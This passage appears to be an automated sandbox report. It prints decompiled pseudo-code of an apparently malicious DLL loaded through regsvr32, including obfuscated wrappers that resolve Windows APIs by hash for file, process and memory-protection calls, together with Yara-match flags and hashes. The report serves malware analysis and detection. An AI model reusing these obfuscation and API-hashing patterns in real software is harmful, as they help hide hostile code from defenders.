                                                                                                                			E10043E29(intOrPtr _a4) {
                                                                                                                				void* _t6;
                                                                                                                				intOrPtr _t7;
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                				 *0x10071464 = _t6;
                                                                                                                				if(_t6 != 0) {
                                                                                                                					_t7 = E10043DCE(__eflags);
                                                                                                                					__eflags = _t7 - 3;
                                                                                                                					 *0x10072bec = _t7;
                                                                                                                					if(_t7 != 3) {
                                                                                                                						L5:
                                                                                                                						__eflags = 1;
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						_t10 = E100432CF(0x3f8);
                                                                                                                						__eflags = _t10;
                                                                                                                						if(_t10 != 0) {
                                                                                                                							goto L5;
                                                                                                                						} else {
                                                                                                                							HeapDestroy( *0x10071464);
                                                                                                                							 *0x10071464 =  *0x10071464 & 0x00000000;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,1003CF94,00000001,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C), ref: 10043E3A
                                                                                                                • HeapDestroy.KERNEL32(?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10043E70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CreateDestroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3296620671-0
                                                                                                                • Opcode ID: 857fe83e44da9f7500877e47c13858bed751010e267648675e8e161a80e4069a
                                                                                                                • Instruction ID: 80eac13385dfa27a13768e7c4a11f622fe383da96b32f3e20cdc48349beb3a6a
                                                                                                                • Opcode Fuzzy Hash: 857fe83e44da9f7500877e47c13858bed751010e267648675e8e161a80e4069a
                                                                                                                • Instruction Fuzzy Hash: DEE09270A16311AEFB40DB329D453AA37E8E744786F24E435F440D50E5FB748480DA08
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E10006D80() {
                                                                                                                				signed int _t110;
                                                                                                                				signed int _t116;
                                                                                                                				signed int _t163;
                                                                                                                				signed int _t187;
                                                                                                                				signed int _t188;
                                                                                                                				signed int _t192;
                                                                                                                				signed int _t204;
                                                                                                                				signed int _t207;
                                                                                                                				signed int _t208;
                                                                                                                				signed int _t215;
                                                                                                                				signed int _t222;
                                                                                                                				intOrPtr* _t233;
                                                                                                                				long _t246;
                                                                                                                				signed int _t249;
                                                                                                                				signed int _t250;
                                                                                                                				signed int _t254;
                                                                                                                				signed int _t278;
                                                                                                                				signed int _t282;
                                                                                                                				void* _t287;
                                                                                                                
                                                                                                                				_t246 =  *(_t287 + 0x18);
                                                                                                                				_t110 =  *(_t246 + 8);
                                                                                                                				 *(_t287 + 0xc) = _t110;
                                                                                                                				if(_t110 != 0) {
                                                                                                                					_t208 =  *0x1006c2c4; // 0x0
                                                                                                                					_t187 =  *(_t246 + 0xc);
                                                                                                                					_t254 =  *0x1006c2bc; // 0x0
                                                                                                                					 *(_t287 + 0x10) = _t187;
                                                                                                                					if((_t187 & _t254 * _t208 + 0x02000000 + _t254 * _t208 * 0x00000004) == 0) {
                                                                                                                						_t188 =  *0x1006c2c8; // 0x0
                                                                                                                						_t215 =  *0x1006c2c0; // 0x0
                                                                                                                						_t249 =  *0x1006c2cc; // 0x0
                                                                                                                						_t116 =  *0x1006c2d0; // 0x0
                                                                                                                						asm("sbb ebp, ebp");
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						_t63 = _t249 * _t249 * 2; // 0x3
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						 *(_t287 + 0x14) =  *(0x1006c2d8 + ( ~( ~(_t254 -  *0x1006c2d0 + _t208 + (_t254 -  *0x1006c2d0 + _t208) * 0x00000002 + _t254 -  *0x1006c2d0 + _t208 + (_t254 -  *0x1006c2d0 + _t208) * 0x00000002 - (_t249 * _t249 + _t63 + 0x00000003) * _t215 - 0x80000000 &  *(_t287 + 0x10))) + ( ~( ~((_t116 * _t254 * _t254 + _t116 * _t254 * _t254 * 0x00000002 - 0x00000003) * _t215 + (_t215 - _t188 * _t208) * _t188 - _t249 + _t208 + ((_t215 - _t188 * _t208) * _t188 - _t249 + _t208) * 0x00000002 + 0x40000000 &  *(_t287 + 0x10))) +  ~( ~((_t249 - _t188 + _t208) * _t215 - _t249 + _t188 + 0x20000000 + ((_t249 - _t188 + _t208) * _t215 - _t249 + _t188) * 0x00000002 &  *(_t287 + 0x10))) * 2) * 2) * 4);
                                                                                                                						_t192 =  *0x1006c2c8; // 0x0
                                                                                                                						_t278 =  *0x1006c2d0; // 0x0
                                                                                                                						if(( *(_t287 + 0x10) & ((_t215 * _t249 * _t208 * _t208 * _t208 + _t215 * _t249 * _t208 * _t208 * _t208 - 0x00000002) * _t215 + (0x00000002 - _t254) * 0x00000002) * _t215 + 0x04000000 + ((0x00000001 - _t192 * _t254 - _t208) *  *0x1006c2c8 + _t208 + _t208 * 0x00000002 - _t249) * 0x00000002) != 0) {
                                                                                                                							 *(_t287 + 0x14) =  *(_t287 + 0x14) | (((0x00000001 - _t254) * _t208 + _t278) * 0x00000004 - 0x00000004) *  *0x1006c2c8 + 0x00000200 + ((0x00000001 - _t208) * _t249 + _t278) * 0x00000004;
                                                                                                                						}
                                                                                                                						 *(_t287 + 0x10) = _t208 + _t278;
                                                                                                                						_t99 = _t215 * _t254 * 2; // -3
                                                                                                                						_t163 = VirtualProtect( *( *(_t287 + 0x2c)), ((_t215 * _t254 + _t99 - 3) * _t249 +  *(_t287 + 0x18) +  *(_t287 + 0x18) * 2) * _t249 + (1 - _t208) * _t215 - _t278 + _t278 + _t254 + 2 - _t208 + _t208 * 2 +  *((intOrPtr*)(_t287 + 0x20)),  *(_t287 + 0x18), _t287 + 0x24 + (_t215 + _t208) * 8); // executed
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						return  ~( ~_t163);
                                                                                                                					} else {
                                                                                                                						_t222 =  *_t246;
                                                                                                                						 *(_t287 + 0x14) = _t222;
                                                                                                                						if(_t222 ==  *((intOrPtr*)(_t246 + 4))) {
                                                                                                                							_t282 =  *0x1006c2d0; // 0x0
                                                                                                                							_t250 =  *0x1006c2cc; // 0x0
                                                                                                                							if( *((intOrPtr*)(_t246 + 0x10)) != 0) {
                                                                                                                								L8:
                                                                                                                								_t204 =  *0x1006c2c0; // 0x0
                                                                                                                								_t38 = (_t204 * _t208 + _t250 * _t254 +  *0x1006c2c8) * 4; // -15
                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x28)) + 0x20))))( *(_t287 + 0x18),  *((intOrPtr*)(_t287 + 0x1c)), ((_t204 * _t204 - _t282 * _t254) * _t208 + _t254 + 1) * _t204 - _t250 + _t250 * 2 + (((_t204 * _t204 - _t282 * _t254) * _t208 + _t254 + 1) * _t204 - _t250 + _t250 * 2) * 4 + (_t204 * _t208 + _t250 * _t254 +  *0x1006c2c8 + _t38 - 0xf) * _t282 + 0x4000,  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x20)) + 0x34)));
                                                                                                                							} else {
                                                                                                                								_t233 =  *((intOrPtr*)(_t287 + 0x20));
                                                                                                                								_t207 =  *(_t233 + 0x3c);
                                                                                                                								if( *((intOrPtr*)( *_t233 + 0x38)) == _t207) {
                                                                                                                									goto L8;
                                                                                                                								} else {
                                                                                                                									 *(_t287 + 0x24) = _t250 * _t254 * _t208;
                                                                                                                									_t241 = (_t282 -  *(_t287 + 0x24) + 1) * _t208;
                                                                                                                									_t22 = (_t282 -  *(_t287 + 0x24) + 1) * _t208 + _t241 * 2 - 6; // -7
                                                                                                                									if(((_t282 -  *(_t287 + 0x24) + 1) * _t208 + _t241 * 2 + _t22) * _t250 + _t110 % _t207 + (_t254 + _t254 * 2) * 2 == 0) {
                                                                                                                										_t282 =  *0x1006c2d0; // 0x0
                                                                                                                										goto L8;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						return 1;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: edc66d10ce20756c2b98548356f509ee5f4656373e62e6f350df609721060a77
                                                                                                                • Instruction ID: d23e61ff439dd59ef86bb16d1c83da8f7f88d15556f78113404b724ff760b7fb
                                                                                                                • Opcode Fuzzy Hash: edc66d10ce20756c2b98548356f509ee5f4656373e62e6f350df609721060a77
                                                                                                                • Instruction Fuzzy Hash: 0C81843270031B8FD318DF5CDDC1A99B7AAFBD8300F05963AD854CB2B5E670E6198A80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E001BA50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				signed int _t66;
                                                                                                                				signed int _t67;
                                                                                                                
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				E001AC98A(_t54);
                                                                                                                				_v28 = 0xdc14f8;
                                                                                                                				_v24 = 0xd964fd;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0xcfd091;
                                                                                                                				_v16 = _v16 << 0x10;
                                                                                                                				_v16 = _v16 << 8;
                                                                                                                				_v16 = _v16 ^ 0x910ec0c9;
                                                                                                                				_v12 = 0x7a2ff2;
                                                                                                                				_t66 = 0x43;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xd721c1d7;
                                                                                                                				_v12 = _v12 ^ 0xd727192a;
                                                                                                                				_v8 = 0x1eb7c0;
                                                                                                                				_v8 = _v8 ^ 0x33199484;
                                                                                                                				_t67 = 0x2d;
                                                                                                                				_v8 = _v8 * 0xa;
                                                                                                                				_v8 = _v8 / _t67;
                                                                                                                				_v8 = _v8 ^ 0x05a21ecf;
                                                                                                                				E001A7F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
                                                                                                                				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
                                                                                                                				return _t65;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 001BA5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: 06c937a76909320fe75c11c2387396e1a6ddbb195fba40b597ba24f862dc4db2
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: C821C276901108FBDF05DFA9D94A9DEBFB6EF48314F108149FA1866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E001A816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t52;
                                                                                                                				struct _STARTUPINFOW* _t56;
                                                                                                                
                                                                                                                				_push(_a64);
                                                                                                                				_t56 = __ecx;
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(_a52);
                                                                                                                				_push(_a48);
                                                                                                                				_push(0);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t45);
                                                                                                                				_v12 = 0x5160ce;
                                                                                                                				_v12 = _v12 ^ 0x33bed16b;
                                                                                                                				_v12 = _v12 + 0xffffe3b5;
                                                                                                                				_v12 = _v12 | 0x3554987c;
                                                                                                                				_v12 = _v12 ^ 0x37f1882e;
                                                                                                                				_v8 = 0x57d154;
                                                                                                                				_v8 = _v8 + 0xffff861a;
                                                                                                                				_v8 = _v8 * 0x3e;
                                                                                                                				_v8 = _v8 >> 8;
                                                                                                                				_v8 = _v8 ^ 0x0012f1da;
                                                                                                                				_v16 = 0x81ccd1;
                                                                                                                				_v16 = _v16 >> 4;
                                                                                                                				_v16 = _v16 >> 5;
                                                                                                                				_v16 = _v16 ^ 0x000c22df;
                                                                                                                				E001A7F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
                                                                                                                				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
                                                                                                                				return _t52;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 001A8236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: 688ecebf684eeea89edb2f2aa616b81e273943912f7772b46daf64c6c4c1f26b
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: FC21A372801248FBCF159F95CD09CCFBFB9EB99714F108098FA1562161D3729A65EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001A3466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t29;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_t41 = __ecx;
                                                                                                                				E001AC98A(_t29);
                                                                                                                				_v8 = 0x88f6ec;
                                                                                                                				_v8 = _v8 | 0x6177bf25;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 + 0x167f;
                                                                                                                				_v8 = _v8 ^ 0x0004f919;
                                                                                                                				_v16 = 0x9ca171;
                                                                                                                				_v16 = _v16 >> 8;
                                                                                                                				_v16 = _v16 ^ 0x0005b7ae;
                                                                                                                				_v12 = 0xf5b080;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x54793a02;
                                                                                                                				_t35 = E001A7F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
                                                                                                                				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001A34FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: e1c0a7305d2460bac920d3b897c459a54dd61f9e4613ddec19657bf7b9ed268d
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: E0113671801248BBCB11DFA6DD0ACDFBFB8EB95704F108098F914A2210D3714B24DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001BEAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr* _t40;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				E001AC98A(_t35);
                                                                                                                				_v28 = 0xe6c580;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v8 = 0x2d161b;
                                                                                                                				_v8 = _v8 + 0xffffdf88;
                                                                                                                				_v8 = _v8 >> 0xa;
                                                                                                                				_v8 = _v8 | 0xc1e5ff2b;
                                                                                                                				_v8 = _v8 ^ 0xc1e88dee;
                                                                                                                				_v16 = 0xd78d92;
                                                                                                                				_v16 = _v16 ^ 0xcf4c3c1d;
                                                                                                                				_v16 = _v16 ^ 0xcf92c072;
                                                                                                                				_v12 = 0x4f9c9d;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 + 0xffff6ea2;
                                                                                                                				_v12 = _v12 ^ 0x00061ead;
                                                                                                                				_t40 = E001A7F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
                                                                                                                				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                				return _t41;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 001BEB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: 3cadde662fba60de6997c7662c49b9ca04e307189950b176b1e8e9e34eeb657e
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 99111376C0121DFFCF11DFA4990A9EEBFB4EB54314F108089EA14A6294D3B14B64AFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001B7DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t34;
                                                                                                                				int _t44;
                                                                                                                				signed int _t46;
                                                                                                                				signed int _t47;
                                                                                                                				struct _SHFILEOPSTRUCTW* _t54;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t54 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t34);
                                                                                                                				_v12 = 0xcdb49a;
                                                                                                                				_v12 = _v12 + 0x8f05;
                                                                                                                				_v12 = _v12 + 0xffff9965;
                                                                                                                				_v12 = _v12 ^ 0x00c100f7;
                                                                                                                				_v16 = 0xfe6a9a;
                                                                                                                				_v16 = _v16 + 0xffff1466;
                                                                                                                				_v16 = _v16 ^ 0x00fd95e9;
                                                                                                                				_v8 = 0xca762f;
                                                                                                                				_v8 = _v8 << 0xe;
                                                                                                                				_t46 = 0x7f;
                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                				_t47 = 0x2e;
                                                                                                                				_v8 = _v8 / _t47;
                                                                                                                				_v8 = _v8 ^ 0x00082e4e;
                                                                                                                				E001A7F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
                                                                                                                				_t44 = SHFileOperationW(_t54); // executed
                                                                                                                				return _t44;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 001B7E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: e50ffbea6b96aeef489ac29e7ae3855f99aa39c1ce78ffcbd59fb15ac6aa02ce
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: BF118BB1E00208FFDB14DFA9D80A8DEBBB5EB45314F20C199E418A7241E7B55F149F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E001A3506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E001AC98A(_t39);
                                                                                                                				_v16 = 0xf4e2fc;
                                                                                                                				_t49 = 0x3b;
                                                                                                                				_v16 = _v16 / _t49;
                                                                                                                				_v16 = _v16 ^ 0x00083f87;
                                                                                                                				_v12 = 0x549d10;
                                                                                                                				_v12 = _v12 << 0xd;
                                                                                                                				_v12 = _v12 + 0xffff8515;
                                                                                                                				_v12 = _v12 | 0x9f85c2ad;
                                                                                                                				_v12 = _v12 ^ 0x9fa0e66d;
                                                                                                                				_v8 = 0xbeaf63;
                                                                                                                				_v8 = _v8 | 0x7acbe5f7;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 ^ 0x3b62dfe8;
                                                                                                                				_v8 = _v8 ^ 0xcc9b72fd;
                                                                                                                				E001A7F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
                                                                                                                				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
                                                                                                                				return _t47;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 001A35AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: e4877d9645bbb4c00aff37757ac1bf8aab92bc4fcf5b980bc31a43f8dea92ec9
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: E11125B5D00208FFCF05EFA4D84689EBFB5EB44704F208088F914AA221D3728B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E10008AF0(void* __ebx, void* __esi, void* __eflags) {
                                                                                                                				signed int _t2;
                                                                                                                				void* _t3;
                                                                                                                				signed int _t8;
                                                                                                                				char _t10;
                                                                                                                				signed int _t12;
                                                                                                                				void* _t13;
                                                                                                                				void* _t14;
                                                                                                                				signed int _t16;
                                                                                                                
                                                                                                                				_t2 =  *0x1006c2d4; // 0x0
                                                                                                                				_t3 = E1003B4DA(__ebx, _t13, _t14, __esi, _t2);
                                                                                                                				if(_t3 != 0) {
